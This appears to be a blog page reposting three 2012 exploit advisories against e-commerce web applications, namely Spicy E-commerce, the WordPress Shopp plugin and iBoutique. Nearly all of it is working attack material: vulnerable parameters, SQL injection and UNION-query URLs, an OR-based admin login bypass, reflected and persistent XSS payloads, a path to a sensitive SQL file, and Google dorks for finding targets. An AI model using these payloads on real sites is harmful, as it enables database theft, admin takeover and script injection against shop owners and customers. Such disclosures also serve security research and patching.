MondoUnix Unix, Linux, FreeBSD, BSD, GNU, Kernel , RHEL, CentOS, Solaris, AIX, HP-UX, Mac OS X, Tru64, SCO UnixWare, Xenix, HOWTO, NETWORKING, IPV6

13Oct/120

Spicy E-commerce – SQL Injection Vulnerability

##########################################
# Exploit Title: Spicy E-commerce - SQL Injection Vulnerability
# Date: 2012-10-9
# Author: DaOne aka Mocking Bird
# Home: 1337day Inj3ct0r Exploit Database
# Software Link: http://www.spicywebtech.com/ecommerce_packages.php
# Category: webapps/php
# Google dork: O_o
# Demo: http://demo.spicywebtech.com/ecommerce/
##########################################
 
[#] SQL Injection:
/index.php paramerer mPath, cPath
/details.php parameter proid
http://site.com/index.php?mPath='[SQLi]
http://site.com/index.php?cPath='[SQLi]
http://site.com/details.php?proid='[SQLi]
 
 
[#] Admin Auth Bypass:
/adminpanel/login_check.php
username: ' OR 'lol'='lol
password: ' OR 'lol'='lol
 
 
 
<----------------------------------------------------------------------------->
|              10x to: r00tw0rm members and Inj3ct0r Team:                    |
| r0073r * Sid3^effects * r4dc0re * CrosS * SeeMe * anT!-Tr0J4n * KedAns-Dz   |
| Angel Injection * NuxbieCyber * Sammy FORGIT * Taurus Omar * TUNISIAN CYBER |
<----------------------------------------------------------------------------->

(200)

9Oct/120

WordPress Shopp v1.0.17 eCommerce Plugin XSS/LFI Vulnerabilities

#### 
# Exploit Title: WordPress Shopp v1.0.17 - eCommerce Plugin <= (xSS/LFI) Multiple Vulnerabilities
# Author: T0x!c
# Date : 05/10/2012  
# Facebook Page: www.facebook.com/DzTem
# E-mail: Malik_99@hotmail.fr
# Category:: webapps
# Google Dork: inurl:"/gateways/2Checkout/"
# Download: http://www.scriptmafia.com/plugins/60186-shopp-v1017-ecommerce-plugin-for-wordpress.html
# Version: v1.0.17
# Tested on: [Windows 7]/
####
# Greetings tO: |KhalEd Ked'Ans| ^___^ I MiSS yOu br0thEr <3
 
#### P0c (1) Reflected xSS =>
-> http://127.0.0.1/Shopp_v1.0.17/core/ui/behaviors/swfupload/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert("xSS");//
 
#### P0c (2) Access sensitive SQL file =>
->http://127.0.0.1/Shopp_v1.0.17/core/model/schema.sql
etc...
 
# - Special Thanks:
# ...:::' 1337day - Inj3ct0r TEAM ':::...

(303)

21Jun/120

iBoutique eCommerce v4.0 – Multiple Web Vulnerabilites

Proof of Concept:
=================
The sql injection vulnerability can be exploited by remote attackers without user inter action. For demonstration or reproduce ...
 
1.1
http://127.0.0.1:1338/iboutique/index.php?page=en_Orders&OrderNumber=258'+/*!Union*/+/*!SelEct*/+1,2,3,4,version(),6,7,8,9,10--%20-
 
1.2
The persistent input validation vulnerabilities can be exploited by remote attackers with low required user inter action.
For demonstration or reproduce ...
 
The attacker create an account and then changed his first name, last name, email, state, address, etc..  to malicious html code.
To change, the first name the attacker needs to go to  my area > my profile > edit profile then inject a malicious code i.e., <iframe src=www.vuln-lab.com onload=alert("VL")/>
When the admin browses the payments page in the control panel the persistent injected code will be executed out of the web context.
 
LINK : http://www.vulnerability-lab.com/get_content.php?id=594

(173)